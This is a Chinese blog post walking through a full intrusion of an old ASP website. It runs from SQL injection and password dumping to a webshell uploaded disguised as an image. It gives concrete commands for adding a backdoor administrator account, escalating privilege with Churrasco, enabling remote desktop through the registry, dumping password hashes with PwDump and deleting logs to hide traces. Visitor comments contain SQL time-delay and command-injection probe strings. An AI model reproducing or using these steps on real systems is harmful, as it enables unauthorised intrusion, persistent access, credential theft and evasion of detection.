注册 登录
  • 不是具有中国特色的社会主义, 而是具有中国特色的社会达尔文主义!

一次简单的渗透测试

渗透测试 BLGene 147次浏览 1459字 4个评论

一次简单的渗透测试

今天来讲讲一个比来古老的网站,南方数据2.0,网上的源码也很多,下载下来,装个小旋风asp自己搭建一个。相对来说还是很适合刚入门学习渗透测试的人群。一次简单的渗透测试

打开一个链接,在URL输入and 1=1返回正常页面参数,输入and 1=2返回错误页面参数。说明存在SQL注入漏洞,我们用明小子来爆密码试试吧,也可以试试啊D之类的工具。一次简单的渗透测试

很显然都是这些表名都是很容易猜解出来的,将猜解出来的md5解密,网上解md5的网站很多。一次简单的渗透测试

有了账号密码,接下来找后台了,试试用啊D来扫后台吧,也可以试试御剑,明小子自带也有扫后台的功能。一次简单的渗透测试

一扫就出来,有了后台路径跟账号密码就可以进后台了。到后台随便看看,寻找一些有利用价值的地方,看到一个可以上装图片的地方,我们可以将一句话木马隐藏在图片里面上传进去,也可以利用截断上传。一次简单的渗透测试

成功上传图片了,接下来将jpg后缀更改成可利用的asp,看到一个数据库备份的地方,还尝试将后缀改成asp吧。一次简单的渗透测试

更改成功,将访问更改的asp,可以返回刚才标记的界面。拿下webshell就可以上中国菜刀了。一次简单的渗透测试

成功连接上,又键打开终端,看看能不能新建用户

net user will 123456 /add

成功添加,在将用户加进管理员组里

net localgroup administrators will /add

添加进去了,如果无权限执行命令,可以上传自己的cmd.exe,再上传Churrasco。利用Churrasco提权。

Churrasco “net user will 123456 /add“
Churrasco “net localgroup administrators will /add“

一次简单的渗透测试

可以看到我们添加进去的用户,利用netstat -an查看当前开放的端口,显然服务器没开3389端口,我们利用批处理打开3389。

echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg

将代码写入文本文档,更改为3389.bat。在用终端执行,执行成功。一次简单的渗透测试

打开远程桌面,连接服务器,输入我们新添加的用户will。一次简单的渗透测试

连接成功。上传PwDump,执行,获取到所以用户及administrator的hash值一次简单的渗透测试

将获取到的hash值解密。现在网上解lm的而且免费相对来说很少,我在这分享一个链接

http://www.objectif-securite.ch/en/ophcrack.php一次简单的渗透测试

成功解密出来。接下来删除刚新建的will用户,删除登录日志及上传的工具跟文件。


T1op|T1op.com , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明一次简单的渗透测试
喜欢 (2)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(4)个小伙伴在吐槽
  1. if(now()=sysdate(),sleep(21),0)/*'XOR(if(now()=sysdate(),sleep(21),0))OR'"XOR(if(now()=sysdate(),sleep(21),0))OR"*/
    12017-09-12 11:04 回复
  2. `cat /etc/passwd`
    12017-09-12 11:10 回复
  3. 1
    12017-09-12 11:28 回复